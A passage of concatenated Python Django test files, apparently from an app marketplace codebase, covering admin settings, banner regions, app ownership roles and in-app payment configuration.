self.compare({'priority_review': False})
def test_staff(self):
# Staff and Support Staff should have Apps:Configure.
self.log_in_with('Apps:Configure')
# Test GET.
r = self.client.get(self.edit_url)
eq_(r.status_code, 200)
eq_(pq(r.content)('form').length, 1)
assert r.context.get('form'), 'Admin Settings form expected in context'
# Test POST. Ignore errors.
eq_(self.client.post(self.edit_url).status_code, 200)
def test_developer(self):
# Developers have read-only on admin section.
self.log_in_with('Apps:ViewConfiguration')
# Test GET.
r = self.client.get(self.edit_url)
eq_(r.status_code, 200)
eq_(pq(r.content)('form').length, 1)
assert r.context.get('form'), 'Admin Settings form expected in context'
# Test POST. Ignore errors.
eq_(self.client.post(self.edit_url).status_code, 403)
def test_banner_region_view(self):
self.log_in_with('Apps:ViewConfiguration')
geodata = self.get_webapp().geodata
geodata.banner_message = u'Exclusive message ! Only for AR/BR !'
geodata.banner_regions = [mkt.regions.BR.id, mkt.regions.AR.id]
geodata.save()
res = self.client.get(self.url)
eq_(pq(res.content)('#id_banner_message').text(),
unicode(geodata.banner_message))
eq_(pq(res.content)('#id_banner_regions').text(), u'Argentina, Brazil')
def test_banner_region_edit(self):
self.log_in_with('Apps:ViewConfiguration')
geodata = self.webapp.geodata
geodata.banner_message = u'Exclusive message ! Only for AR/BR !'
geodata.banner_regions = [mkt.regions.BR.id, mkt.regions.AR.id]
geodata.save()
AER.objects.create(addon=self.webapp, region=mkt.regions.US.id)
res = self.client.get(self.edit_url)
eq_(res.status_code, 200)
doc = pq(res.content)
inputs = doc.find('input[type=checkbox][name=banner_regions]')
eq_(inputs.length, len(mkt.regions.REGIONS_CHOICES_ID))
checked = doc.find('#id_banner_regions input[type=checkbox]:checked')
eq_(checked.length, 2)
eq_(checked[0].name, 'banner_regions')
eq_(checked[0].value, unicode(mkt.regions.AR.id))
eq_(pq(checked[0]).parents('li').attr('data-region'),
unicode(mkt.regions.AR.id))
eq_(checked[1].name, 'banner_regions')
eq_(checked[1].value, unicode(mkt.regions.BR.id))
eq_(pq(checked[1]).parents('li').attr('data-region'),
unicode(mkt.regions.BR.id))
def test_banner_region_edit_post(self):
data = {
'position': 1, # Required, useless in this test.
'banner_regions': [unicode(mkt.regions.BR.id),
unicode(mkt.regions.SPAIN.id)],
'banner_message_en-us': u'Oh Hai.',
}
res = self.client.post(self.edit_url, data)
eq_(res.status_code, 200)
geodata = self.webapp.geodata.reload()
eq_(geodata.banner_message, data['banner_message_en-us'])
eq_(geodata.banner_regions, [mkt.regions.BR.id, mkt.regions.SPAIN.id])
class TestPromoUpload(TestAdmin):
fixtures = TestEdit.fixtures
def post(self, **kw):
data = {'position': '1',
'upload_hash': 'abcdef'}
data.update(kw)
self.client.post(self.edit_url, data)
def test_add(self):
self.post()
webapp = self.get_webapp()
eq_(webapp.previews.count(), 1)
eq_(list(webapp.get_previews()), [])
promo = webapp.get_promo()
eq_(promo.position, -1)
def test_delete(self):
self.post()
assert self.get_webapp().get_promo()
self.post(DELETE=True)
assert not self.get_webapp().get_promo()
class TestEditVersion(TestEdit):
fixtures = fixture('group_admin', 'user_999', 'user_admin',
'user_admin_group', 'webapp_337141')
def setUp(self):
self.webapp = self.get_webapp()
self.webapp.update(is_packaged=True)
self.version_pk = self.webapp.latest_version.pk
self.url = reverse('mkt.developers.apps.versions.edit', kwargs={
'version_id': self.version_pk,
'app_slug': self.webapp.app_slug
})
self.user = UserProfile.objects.get(username='31337')
self.login(self.user)
def test_post(self, **kwargs):
data = {'releasenotes_init': '',
'releasenotes_en-us': 'Hot new version',
'approvalnotes': 'The release notes are true.',
'has_audio': False,
'has_apps': False}
data.update(kwargs)
req = self.client.post(self.url, data)
eq_(req.status_code, 302)
version = Version.objects.no_cache().get(pk=self.version_pk)
eq_(version.releasenotes, data['releasenotes_en-us'])
eq_(version.approvalnotes, data['approvalnotes'])
return version
def test_comm_thread(self):
self.create_switch('comm-dashboard')
# With empty note.
self.test_post(approvalnotes='')
eq_(CommunicationNote.objects.count(), 0)
self.test_post(approvalnotes='abc')
notes = CommunicationNote.objects.all()
eq_(notes.count(), 1)
eq_(notes[0].body, 'abc')
def test_existing_features_initial_form_data(self):
features = self.webapp.current_version.features
features.update(has_audio=True, has_apps=True)
r = self.client.get(self.url)
eq_(r.context['appfeatures_form'].initial,
dict(id=features.id, **features.to_dict()))
def test_new_features(self):
assert not RereviewQueue.objects.filter(addon=self.webapp).exists()
# Turn a feature on.
version = self.test_post(has_audio=True)
ok_(version.features.has_audio)
ok_(not version.features.has_apps)
# Then turn the feature off.
version = self.test_post(has_audio=False)
ok_(not version.features.has_audio)
ok_(not version.features.has_apps)
# Changing features must trigger re-review.
assert RereviewQueue.objects.filter(addon=self.webapp).exists()
def test_correct_version_features(self):
new_version = self.webapp.latest_version.update(id=self.version_pk + 1)
self.webapp.update(_latest_version=new_version)
self.test_new_features()
def test_publish_checkbox_presence(self):
res = self.client.get(self.url)
ok_(not pq(res.content)('#id_publish_immediately'))
self.webapp.latest_version.files.update(status=amo.STATUS_PENDING)
res = self.client.get(self.url)
ok_(pq(res.content)('#id_publish_immediately'))
########NEW FILE########
__FILENAME__ = test_views_ownership
import datetime
from django.core.urlresolvers import reverse
from nose.tools import eq_
from pyquery import PyQuery as pq
import waffle
import amo
import amo.tests
from amo.tests import formset
from addons.models import Addon, AddonUser
from devhub.models import ActivityLog
from mkt.site.fixtures import fixture
from users.models import UserProfile
class TestOwnership(amo.tests.TestCase):
fixtures = ['base/apps', 'base/users'] + fixture('webapp_337141')
def setUp(self):
self.webapp = self.get_webapp()
self.url = self.webapp.get_dev_url('owner')
assert self.client.login(username='[email protected]',
password='password')
# Users are required to have read the dev agreement to become owners.
UserProfile.objects.filter(id__in=[31337, 999]).update(
read_dev_agreement=datetime.datetime.now())
def formset(self, *args, **kw):
return formset(*args, **kw)
def get_webapp(self):
return Addon.objects.no_cache().get(id=337141)
class TestEditAuthor(TestOwnership):
def test_reorder_authors(self):
"""
Re-ordering authors should not generate role changes in the
ActivityLog.
"""
# flip form-0-position
f = self.client.get(self.url).context['user_form'].initial_forms[0]
u = dict(user='[email protected]', listed=True,
role=amo.AUTHOR_ROLE_DEV, position=0)
data = self.formset(f.initial, u, initial_count=1)
r = self.client.post(self.url, data)
eq_(r.status_code, 302)
f = self.client.get(self.url).context['user_form'].initial_forms[0]
u1 = f.initial
u1['position'] = 1
f = self.client.get(self.url).context['user_form'].initial_forms[1]
u2 = f.initial
data = self.formset(u1, u2)
orig = ActivityLog.objects.all().count()
r = self.client.post(self.url, data)
self.assertRedirects(r, self.url, 302)
eq_(ActivityLog.objects.all().count(), orig)
def test_success_add_user(self):
q = (AddonUser.objects.no_cache().filter(addon=self.webapp.id)
.values_list('user', flat=True))
eq_(list(q.all()), [31337])
f = self.client.get(self.url).context['user_form'].initial_forms[0]
u = dict(user='[email protected]', listed=True,
role=amo.AUTHOR_ROLE_DEV, position=0)
data = self.formset(f.initial, u, initial_count=1)
r = self.client.post(self.url, data)
self.assertRedirects(r, self.url, 302)
eq_(list(q.all()), [31337, 999])
def test_success_edit_user(self):
# Add an author b/c we can't edit anything about the current one.
f = self.client.get(self.url).context['user_form'].initial_forms[0]
u = dict(user='[email protected]', listed=True,
role=amo.AUTHOR_ROLE_DEV, position=1)
data = self.formset(f.initial, u, initial_count=1)
self.client.post(self.url, data)
eq_(AddonUser.objects.get(addon=self.webapp.id, user=999).listed, True)
# Edit the user we just added.
user_form = self.client.get(self.url).context['user_form']
one, two = user_form.initial_forms
del two.initial['listed']
empty = dict(user='', listed=True, role=5, position=0)
data = self.formset(one.initial, two.initial, empty, initial_count=2)
r = self.client.post(self.url, data)
self.assertRedirects(r, self.url, 302)
eq_(AddonUser.objects.get(addon=self.webapp.id, user=999).listed,
False)
def test_add_user_twice(self):
f = self.client.get(self.url).context['user_form'].initial_forms[0]
u = dict(user='[email protected]', listed=True,
role=amo.AUTHOR_ROLE_DEV, position=1)
data = self.formset(f.initial, u, u, initial_count=1)
r = self.client.post(self.url, data)
eq_(r.status_code, 200)
eq_(r.context['user_form'].non_form_errors(),
['A team member can only be listed once.'])
def test_success_delete_user(self):
# Add a new user so we have one to delete.
data = self.formset(dict(user='[email protected]', listed=True,
role=amo.AUTHOR_ROLE_OWNER, position=1),
initial_count=0)
self.client.post(self.url, data)
one, two = self.client.get(self.url).context['user_form'].initial_forms
one.initial['DELETE'] = True
data = self.formset(one.initial, two.initial, initial_count=2)
r = self.client.post(self.url, data)
eq_(r.status_code, 302)
eq_(AddonUser.objects.get(addon=self.webapp.id).user_id, 999)
def test_delete_own_access(self):
# Add a new user and then delete the first user.
data = self.formset(dict(user='[email protected]', listed=True,
role=amo.AUTHOR_ROLE_OWNER, position=1),
initial_count=0)
self.client.post(self.url, data)
one, two = self.client.get(self.url).context['user_form'].initial_forms
one.initial['DELETE'] = True
data = self.formset(one.initial, two.initial, initial_count=2)
r = self.client.post(self.url, data)
# We should be redirected to our My submissions page since we have
# now lost access to the current app by deleting our own access.
self.assertRedirects(r, reverse('mkt.developers.apps'), 302)
def test_switch_owner(self):
# See if we can transfer ownership in one POST.
f = self.client.get(self.url).context['user_form'].initial_forms[0]
f.initial['user'] = '[email protected]'
data = self.formset(f.initial, initial_count=1)
r = self.client.post(self.url, data)
eq_(r.status_code, 302)
eq_(AddonUser.objects.get(addon=self.webapp.id).user_id, 999)
eq_(ActivityLog.objects.filter(
action=amo.LOG.ADD_USER_WITH_ROLE.id).count(), 1)
eq_(ActivityLog.objects.filter(
action=amo.LOG.REMOVE_USER_WITH_ROLE.id).count(), 1)
def test_only_owner_can_edit(self):
f = self.client.get(self.url).context['user_form'].initial_forms[0]
u = dict(user='[email protected]', listed=True,
role=amo.AUTHOR_ROLE_DEV, position=0)
data = self.formset(f.initial, u, initial_count=1)
self.client.post(self.url, data)
self.client.login(username='[email protected]', password='password')
self.client.post(self.url, data, follow=True)
# Try deleting the other AddonUser.
one, two = self.client.get(self.url).context['user_form'].initial_forms
one.initial['DELETE'] = True
data = self.formset(one.initial, two.initial, initial_count=2)
r = self.client.post(self.url, data, follow=True)
eq_(r.status_code, 403)
eq_(AddonUser.objects.filter(addon=self.webapp.id).count(), 2)
def test_must_have_listed(self):
f = self.client.get(self.url).context['user_form'].initial_forms[0]
f.initial['listed'] = False
data = self.formset(f.initial, initial_count=1)
r = self.client.post(self.url, data)
eq_(r.context['user_form'].non_form_errors(),
['At least one team member must be listed.'])
def test_must_have_owner(self):
f = self.client.get(self.url).context['user_form'].initial_forms[0]
f.initial['role'] = amo.AUTHOR_ROLE_DEV
data = self.formset(f.initial, initial_count=1)
r = self.client.post(self.url, data)
eq_(r.context['user_form'].non_form_errors(),
['Must have at least one owner.'])
def test_must_have_owner_delete(self):
f = self.client.get(self.url).context['user_form'].initial_forms[0]
f.initial['DELETE'] = True
data = self.formset(f.initial, initial_count=1)
r = self.client.post(self.url, data)
eq_(r.context['user_form'].non_form_errors(),
['Must have at least one owner.'])
def test_author_support_role(self):
# Tests that the support role shows up when the allow-refund switch
# is active.
switch = waffle.models.Switch.objects.create(name='allow-refund',
active=True)
res = self.client.get(self.url)
eq_(res.status_code, 200)
doc = pq(res.content)
role_str = doc('#id_form-0-role').text()
assert 'Support' in role_str, ('Support not in roles. Contained: %s' %
role_str)
switch.active = False
switch.save()
res = self.client.get(self.url)
eq_(res.status_code, 200)
doc = pq(res.content)
assert not 'Support' in doc('#id_form-0-role').text(), (
"Hey, the Support role shouldn't be here!")
class TestEditWebappAuthors(amo.tests.TestCase):
fixtures = ['base/apps', 'base/users'] + fixture('webapp_337141')
def setUp(self):
self.client.login(username='[email protected]', password='password')
self.webapp = Addon.objects.get(id=337141)
self.url = self.webapp.get_dev_url('owner')
def test_apps_context(self):
r = self.client.get(self.url)
eq_(r.context['webapp'], True)
assert 'license_form' not in r.context, 'Unexpected license form'
assert 'policy_form' not in r.context, 'Unexpected policy form'
doc = pq(r.content)
eq_(doc('.edit-addon-nav ul').eq(0).find('a').eq(3).attr('href'),
self.url)
def test_success_add_owner(self):
u = UserProfile.objects.get(id=999)
u = dict(user=u.email, listed=True, role=amo.AUTHOR_ROLE_OWNER,
position=0)
r = self.client.post(self.url, formset(u, initial_count=0))
self.assertRedirects(r, self.url, 302)
owners = (AddonUser.objects.filter(addon=self.webapp.id)
.values_list('user', flat=True))
eq_(list(owners), [31337, 999])
class TestDeveloperRoleAccess(amo.tests.TestCase):
fixtures = fixture('user_999', 'webapp_337141')
def setUp(self):
self.client.login(username='[email protected]', password='password')
self.webapp = Addon.objects.get(pk=337141)
self.webapp.update(premium_type=amo.ADDON_PREMIUM)
user = UserProfile.objects.get(email='[email protected]')
AddonUser.objects.create(addon=self.webapp, user=user,
role=amo.AUTHOR_ROLE_DEV)
def _check_it(self, url):
res = self.client.get(url, follow=True)
eq_(res.status_code, 200)
# Weak sauce. But pq('body.no-edit') or
# pq('body').hasClass('no-edit') doesn't work.
assert 'no-edit' in res.content, ("%s is editable by a developer but "
"shouldn't be" % url)
res = self.client.post(url)
eq_(res.status_code, 403)
def test_urls(self):
urls = ['owner']
for url in urls:
self._check_it(self.webapp.get_dev_url(url))
def test_disable(self):
res = self.client.get(self.webapp.get_dev_url('versions'))
doc = pq(res.content)
eq_(doc('#delete-addon').length, 0)
eq_(doc('#disable-addon').length, 1)
def test_enable(self):
self.webapp.update(disabled_by_user=True)
res = self.client.get(self.webapp.get_dev_url('versions'))
doc = pq(res.content)
eq_(doc('#delete-addon').length, 0)
eq_(doc('#enable-addon').length, 1)
########NEW FILE########
__FILENAME__ = test_views_payments
# -*- coding: utf-8 -*-
import json
from django.conf import settings
from django.core.exceptions import ObjectDoesNotExist
from django.core.urlresolvers import reverse
import mock
from curling.lib import HttpClientError
from mock import ANY
from nose.tools import eq_, ok_
from pyquery import PyQuery as pq
from waffle.models import Switch
import amo
import amo.tests
import mkt
from addons.models import (Addon, AddonDeviceType, AddonPremium, AddonUpsell,
AddonUser, Category)
from constants.payments import (PAYMENT_METHOD_ALL, PAYMENT_METHOD_CARD,
PAYMENT_METHOD_OPERATOR, PROVIDER_BANGO,
PROVIDER_BOKU, PROVIDER_REFERENCE)
from mkt.constants.payments import ACCESS_PURCHASE, ACCESS_SIMULATE
from mkt.constants.regions import ALL_REGION_IDS, SPAIN, US, UK
from mkt.developers.models import (AddonPaymentAccount, PaymentAccount,
SolitudeSeller, UserInappKey)
from mkt.developers.tests.test_providers import Patcher
from mkt.developers.views_payments import (get_inapp_config,
require_in_app_payments)
from mkt.site.fixtures import fixture
from mkt.webapps.models import AddonExcludedRegion as AER
from mkt.prices.models import Price
from users.models import UserProfile
# Id without any significance but to be different of 1.
TEST_PACKAGE_ID = '2'
def setup_payment_account(app, user, uid='uid', package_id=TEST_PACKAGE_ID):
seller = SolitudeSeller.objects.create(user=user, uuid=uid)
payment = PaymentAccount.objects.create(user=user, solitude_seller=seller,
agreed_tos=True, seller_uri=uid,
uri=uid,
account_id=package_id)
return AddonPaymentAccount.objects.create(addon=app,
product_uri='/path/to/%s/' % app.pk, account_uri=payment.uri,
payment_account=payment)
class InappTest(amo.tests.TestCase):
fixtures = fixture('webapp_337141', 'user_999')
def setUp(self):
self.public_id = 'app-public-id'
self.pay_key_secret = 'hex-secret-for-in-app-payments'
self.generic_product_id = '1'
self.app = Addon.objects.get(pk=337141)
self.app.update(premium_type=amo.ADDON_FREE_INAPP,
solitude_public_id=self.public_id)
self.user = UserProfile.objects.get(pk=31337)
self.other = UserProfile.objects.get(pk=999)
self.login(self.user)
self.account = setup_payment_account(self.app, self.user)
self.url = reverse('mkt.developers.apps.in_app_config',
args=[self.app.app_slug])
p = mock.patch('mkt.developers.views_payments.client.api')
self.api = p.start()
self.addCleanup(p.stop)
def set_mocks(self):
"""
Set up mocks to allow in-app payment configuration.
"""
product = {
'resource_pk': self.generic_product_id,
'secret': self.pay_key_secret
}
self.api.generic.product.get_object.return_value = product
self.api.generic.product.get_object_or_404.return_value = product
class TestInappConfig(InappTest):
def test_key_generation(self):
self.set_mocks()
self.client.post(self.url, {})
self.api.generic.product.assert_called_with(self.generic_product_id)
args = self.api.generic.product().patch.call_args
assert 'secret' in args[1]['data']
def test_when_logged_out(self):
self.client.logout()
self.assertLoginRequired(self.client.get(self.url))
def test_non_team_member_cannot_get_config(self):
self.login(self.other)
eq_(self.client.get(self.url).status_code, 403)
def test_other_developer_can_get_config(self):
self.login(self.other)
AddonUser.objects.create(addon=self.app, user=self.other,
role=amo.AUTHOR_ROLE_DEV)
# Developer can read, but not reset.
eq_(self.client.get(self.url).status_code, 200)
eq_(self.client.post(self.url).status_code, 403)
def test_not_inapp(self):
self.app.update(premium_type=amo.ADDON_PREMIUM)
eq_(self.client.get(self.url).status_code, 302)
def test_no_pay_account(self):
self.app.app_payment_accounts.all().delete()
eq_(self.client.get(self.url).status_code, 302)
@require_in_app_payments
def render_in_app_view(request, addon_id, addon, *args, **kwargs):
return 'The view was rendered'
class TestRequireInAppPayments(amo.tests.TestCase):
def good_app(self):
addon = mock.Mock(premium_type=amo.ADDON_INAPPS[0], app_slug='foo')
addon.has_payment_account.return_value = True
return addon
def test_inapp(self):
response = render_in_app_view(addon=self.good_app(), request=None,
addon_id=None)
eq_(response, 'The view was rendered')
@mock.patch('amo.messages.error')
def test_not_inapp(self, error):
addon = self.good_app()
addon.premium_type = amo.ADDON_FREE
response = render_in_app_view(addon=addon, request=None, addon_id=None)
eq_(response.status_code, 302)
@mock.patch('amo.messages.error')
def test_no_pay_account(self, error):
addon = self.good_app()
addon.has_payment_account.return_value = False
response = render_in_app_view(addon=addon, request=None, addon_id=None)
eq_(response.status_code, 302)
class TestGetInappConfig(InappTest):
def setUp(self):
super(TestGetInappConfig, self).setUp()
self.api.generic.product.get_object.return_value = {
'secret': self.pay_key_secret,
'public_id': self.public_id,
}
def test_ok(self):
conf = get_inapp_config(self.app)
eq_(conf['public_id'], self.app.solitude_public_id)
def test_not_configured(self):
self.app.update(solitude_public_id=None)
with self.assertRaises(ValueError):
get_inapp_config(self.app)
class TestInAppProductsView(InappTest):
def setUp(self):
super(TestInAppProductsView, self).setUp()
self.waffle = Switch.objects.create(name='in-app-products',
active=True)
self.url = reverse('mkt.developers.apps.in_app_products',
args=[self.app.app_slug])
def get(self):
return self.client.get(self.url)
def test_finds_products(self):
eq_(self.get().status_code, 200)
def test_requires_author(self):
self.login(self.other)
eq_(self.get().status_code, 403)
def test_without_waffle(self):
self.waffle.active = False
self.waffle.save()
eq_(self.get().status_code, 404)
class TestInappSecret(InappTest):
def setUp(self):
super(TestInappSecret, self).setUp()
self.url = reverse('mkt.developers.apps.in_app_secret',
args=[self.app.app_slug])
def test_show_secret(self):
self.set_mocks()
resp = self.client.get(self.url)
eq_(resp.content, self.pay_key_secret)
self.api.generic.product.get_object.assert_called_with(
public_id=self.public_id)
def test_when_logged_out(self):
self.client.logout()
self.assertLoginRequired(self.client.get(self.url))
def test_non_team_member_cannot_get_secret(self):
self.client.login(username='[email protected]', password='password')
eq_(self.client.get(self.url).status_code, 403)
def test_other_developers_can_access_secret(self):
self.set_mocks()
self.login(self.other)
AddonUser.objects.create(addon=self.app, user=self.other,
role=amo.AUTHOR_ROLE_DEV)
resp = self.client.get(self.url)
eq_(resp.content, self.pay_key_secret)
class InappKeysTest(InappTest):
def setUp(self):
super(InappKeysTest, self).setUp()
self.url = reverse('mkt.developers.apps.in_app_keys')
self.seller_uri = '/seller/1/'
self.product_pk = 2
def setup_solitude(self):
self.api.generic.seller.post.return_value = {
'resource_uri': self.seller_uri}
self.api.generic.product.post.return_value = {
'resource_pk': self.product_pk}
class TestInappKeys(InappKeysTest):
def test_logged_out(self):
self.client.logout()
self.assertLoginRequired(self.client.get(self.url))
def test_no_key(self):
res = self.client.get(self.url)
eq_(res.status_code, 200)
eq_(res.context['key'], None)
def test_key_generation(self):
self.setup_solitude()
res = self.client.post(self.url)
ok_(res['Location'].endswith(self.url), res)
ok_(self.api.generic.seller.post.called)
ok_(self.api.generic.product.post.called)
key = UserInappKey.objects.get()
eq_(key.solitude_seller.resource_uri, self.seller_uri)
eq_(key.seller_product_pk, self.product_pk)
m = self.api.generic.product.post.mock_calls
eq_(m[0][2]['data']['access'], ACCESS_SIMULATE)
@mock.patch('mkt.developers.models.UserInappKey.public_id')
def test_reset(self, mock_public_id):
self.setup_solitude()
key = UserInappKey.create(self.user)
product = mock.Mock()
self.api.generic.product.return_value = product
self.client.post(self.url)
product.patch.assert_called_with(data={'secret': ANY})
self.api.generic.product.assert_called_with(key.seller_product_pk)
def test_keys_page_renders_when_solitude_raises_404(self):
UserInappKey.create(self.user)
self.api.generic.product.side_effect = HttpClientError()
res = self.client.get(self.url)
eq_(res.status_code, 200)
# Test that a message is sent to the user
eq_(len(res.context['messages']), 1)
class TestInappKeySecret(InappKeysTest):
def setup_objects(self):
self.setup_solitude()
key = UserInappKey.create(self.user)
self.url = reverse('mkt.developers.apps.in_app_key_secret',
args=[key.pk])
def test_logged_out(self):
self.setup_objects()
self.client.logout()
self.assertLoginRequired(self.client.get(self.url))
def test_different(self):
self.setup_objects()
self.login(self.other)
eq_(self.client.get(self.url).status_code, 403)
def test_secret(self):
self.setup_objects()
secret = 'not telling'
product = mock.Mock()
product.get.return_value = {'secret': secret}
self.api.generic.product.return_value = product
res = self.client.get(self.url)
eq_(res.status_code, 200)
eq_(res.content, secret)
class TestPayments(Patcher, amo.tests.TestCase):
fixtures = fixture('webapp_337141', 'user_999', 'group_admin',
'user_admin', 'user_admin_group', 'prices')
def setUp(self):
super(TestPayments, self).setUp()
self.webapp = self.get_webapp()
AddonDeviceType.objects.create(
addon=self.webapp, device_type=amo.DEVICE_GAIA.id)
self.url = self.webapp.get_dev_url('payments')
self.user = UserProfile.objects.get(pk=31337)
self.other = UserProfile.objects.get(pk=999)
self.admin = UserProfile.objects.get(email='[email protected]')
# Default to logging in as the app owner.
self.login(self.user)
self.price = Price.objects.filter()[0]
def get_webapp(self):
return Addon.objects.get(pk=337141)
def get_region_list(self):
return list(AER.objects.values_list('region', flat=True))
def get_postdata(self, extension):
base = {'regions': self.get_region_list(),
'free_platforms': ['free-%s' % dt.class_name for dt in
self.webapp.device_types],
'paid_platforms': ['paid-%s' % dt.class_name for dt in
self.webapp.device_types]}
if 'accounts' in extension:
extension['form-TOTAL_FORMS'] = 1
extension['form-INITIAL_FORMS'] = 1
extension['form-MAX_NUM_FORMS'] = 1
extension['form-0-accounts'] = extension['accounts']
del extension['accounts']
base.update(extension)
return base
def test_free(self):
res = self.client.post(
self.url, self.get_postdata({'toggle-paid': 'free'}), follow=True)
eq_(self.get_webapp().premium_type, amo.ADDON_FREE)
eq_(res.context['is_paid'], False)
def test_premium_passes(self):
self.webapp.update(premium_type=amo.ADDON_FREE)
res = self.client.post(self.url,
self.get_postdata({'toggle-paid': 'paid'}),
follow=True)
eq_(self.get_webapp().premium_type, amo.ADDON_PREMIUM)
eq_(res.context['is_paid'], True)
def test_check_api_url_in_context(self):
self.webapp.update(premium_type=amo.ADDON_FREE)
res = self.client.get(self.url)
eq_(res.context['api_pricelist_url'], reverse('price-list'))
def test_regions_display_free(self):
self.webapp.update(premium_type=amo.ADDON_FREE)
res = self.client.get(self.url)
pqr = pq(res.content)
eq_(len(pqr('#regions-island')), 1)
eq_(len(pqr('#paid-regions-island')), 0)
def test_regions_display_premium(self):
self.webapp.update(premium_type=amo.ADDON_PREMIUM)
res = self.client.get(self.url)
pqr = pq(res.content)
eq_(len(pqr('#regions-island')), 0)
eq_(len(pqr('#paid-regions-island')), 1)
def test_free_with_in_app_tier_id_in_content(self):
price_tier_zero = Price.objects.get(price='0.00')
self.webapp.update(premium_type=amo.ADDON_PREMIUM)
res = self.client.get(self.url)
pqr = pq(res.content)
eq_(len(pqr('#region-list[data-tier-zero-id]')), 1)
eq_(int(pqr('#region-list').attr(
'data-tier-zero-id')), price_tier_zero.pk)
def test_not_applicable_data_attr_in_content(self):
self.webapp.update(premium_type=amo.ADDON_PREMIUM)
res = self.client.get(self.url)
pqr = pq(res.content)
eq_(len(pqr('#region-list[data-not-applicable-msg]')), 1)
def test_pay_method_ids_in_context(self):
self.webapp.update(premium_type=amo.ADDON_PREMIUM)
res = self.client.get(self.url)
self.assertSetEqual(res.context['payment_methods'].keys(),
[PAYMENT_METHOD_ALL, PAYMENT_METHOD_CARD,
PAYMENT_METHOD_OPERATOR])
def test_free_with_in_app_deletes_upsell(self):
self.make_premium(self.webapp)
new_upsell_app = Addon.objects.create(
type=self.webapp.type,
status=self.webapp.status,
name='upsell-%s' % self.webapp.id,
premium_type=amo.ADDON_FREE)
new_upsell = AddonUpsell(premium=self.webapp)
new_upsell.free = new_upsell_app
new_upsell.save()
assert self.get_webapp().upsold is not None
self.client.post(self.url,
self.get_postdata({'price': 'free',
'allow_inapp': 'True',
'regions': ALL_REGION_IDS}),
follow=True)
eq_(self.get_webapp().upsold, None)
eq_(AddonPremium.objects.all().count(), 0)
def test_premium_in_app_passes(self):
self.webapp.update(premium_type=amo.ADDON_FREE)
res = self.client.post(
self.url, self.get_postdata({'toggle-paid': 'paid'}))
self.assert3xx(res, self.url)
res = self.client.post(
self.url, self.get_postdata({'allow_inapp': True,
'price': self.price.pk,
'regions': ALL_REGION_IDS}))
self.assert3xx(res, self.url)
eq_(self.get_webapp().premium_type, amo.ADDON_PREMIUM_INAPP)
@mock.patch('mkt.webapps.models.Webapp.is_fully_complete')
def test_later_then_free(self, complete_mock):
complete_mock.return_value = True
self.webapp.update(premium_type=amo.ADDON_PREMIUM,
status=amo.STATUS_NULL,
highest_status=amo.STATUS_PENDING)
self.make_premium(self.webapp)
res = self.client.post(
self.url, self.get_postdata({'toggle-paid': 'free',
'price': self.price.pk}))
self.assert3xx(res, self.url)
eq_(self.get_webapp().status, amo.STATUS_PENDING)
eq_(AddonPremium.objects.all().count(), 0)
def test_premium_price_initial_already_set(self):
self.make_premium(self.webapp)
r = self.client.get(self.url)
eq_(pq(r.content)('select[name=price] option[selected]').attr('value'),
str(self.webapp.premium.price.id))
def test_premium_price_initial_use_default(self):
Price.objects.create(price='10.00') # Make one more tier.
self.webapp.update(premium_type=amo.ADDON_FREE)
res = self.client.post(
self.url, self.get_postdata({'toggle-paid': 'paid'}), follow=True)
pqr = pq(res.content)
eq_(pqr('select[name=price] option[selected]').attr('value'),
str(Price.objects.get(price='0.99').id))
def test_starting_with_free_inapp_has_free_selected(self):
self.webapp.update(premium_type=amo.ADDON_FREE_INAPP)
res = self.client.get(self.url)
pqr = pq(res.content)
eq_(pqr('select[name=price] option[selected]').attr('value'), 'free')
def test_made_free_inapp_has_free_selected(self):
self.make_premium(self.webapp)
res = self.client.post(
self.url, self.get_postdata({'price': 'free',
'allow_inapp': 'True'}), follow=True)
pqr = pq(res.content)
eq_(pqr('select[name=price] option[selected]').attr('value'), 'free')
def test_made_free_inapp_then_free(self):
self.webapp.update(premium_type=amo.ADDON_PREMIUM)
self.make_premium(self.webapp)
self.client.post(
self.url, self.get_postdata({'price': 'free',
'allow_inapp': 'True',
'regions': ALL_REGION_IDS}))
eq_(self.get_webapp().premium_type, amo.ADDON_FREE_INAPP)
self.client.post(
self.url, self.get_postdata({'toggle-paid': 'free',
'regions': ALL_REGION_IDS}))
eq_(self.get_webapp().premium_type, amo.ADDON_FREE)
def test_free_with_inapp_without_account_has_incomplete_status(self):
self.webapp.update(premium_type=amo.ADDON_FREE)
# Toggle to paid
self.client.post(
self.url, self.get_postdata({'toggle-paid': 'paid'}))
res = self.client.post(
self.url, self.get_postdata({'price': 'free',
'allow_inapp': 'True',
'regions': ALL_REGION_IDS}))
self.assert3xx(res, self.url)
eq_(self.get_webapp().status, amo.STATUS_NULL)
eq_(AddonPremium.objects.all().count(), 0)
res = self.client.get(self.url)
pqr = pq(res.content)
eq_(len(pqr('#paid-island-incomplete:not(.hidden)')), 1)
def test_paid_app_without_account_has_incomplete_status(self):
self.webapp.update(premium_type=amo.ADDON_FREE)
# Toggle to paid
self.client.post(
self.url, self.get_postdata({'toggle-paid': 'paid'}))
res = self.client.post(
self.url, self.get_postdata({'price': self.price.pk,
'allow_inapp': 'False',
'regions': ALL_REGION_IDS}))
self.assert3xx(res, self.url)
eq_(self.get_webapp().status, amo.STATUS_NULL)
res = self.client.get(self.url)
pqr = pq(res.content)
eq_(len(pqr('#paid-island-incomplete:not(.hidden)')), 1)
def setup_payment_acct(self, make_owner, user=None, bango_id=123):
# Set up Solitude return values.
gen = self.generic_patcher
prov = self.bango_patcher
gen.product.get_object.side_effect = ObjectDoesNotExist
gen.product.post.return_value = {'resource_uri': 'gpuri'}
prov.product.get_object.side_effect = ObjectDoesNotExist
prov.product.post.return_value = {
'resource_uri': 'bpruri', 'bango_id': 123}
if not user:
user = self.user
amo.set_user(user)
if make_owner:
# Make owner
AddonUser.objects.create(addon=self.webapp,
user=user, role=amo.AUTHOR_ROLE_OWNER)
# Set up an existing bank account.
seller = SolitudeSeller.objects.create(
resource_uri='/path/to/sel', user=user, uuid='uuid-%s' % user.pk)
acct = PaymentAccount.objects.create(
user=user, uri='asdf-%s' % user.pk, name='test', inactive=False,
seller_uri='suri-%s' % user.pk, solitude_seller=seller,
account_id=123, agreed_tos=True)
return acct, user
def is_owner(self, user):
return (self.webapp.authors.filter(pk=user.pk,
addonuser__role=amo.AUTHOR_ROLE_OWNER).exists())
def test_associate_acct_to_app_free_inapp(self):
acct, user = self.setup_payment_acct(make_owner=True)
# Must be an app owner to change this.
assert self.is_owner(user)
# Associate account with app.
self.make_premium(self.webapp)
res = self.client.post(
self.url, self.get_postdata({'price': 'free',
'allow_inapp': 'True',
'regions': ALL_REGION_IDS,
'accounts': acct.pk}), follow=True)
self.assertNoFormErrors(res)
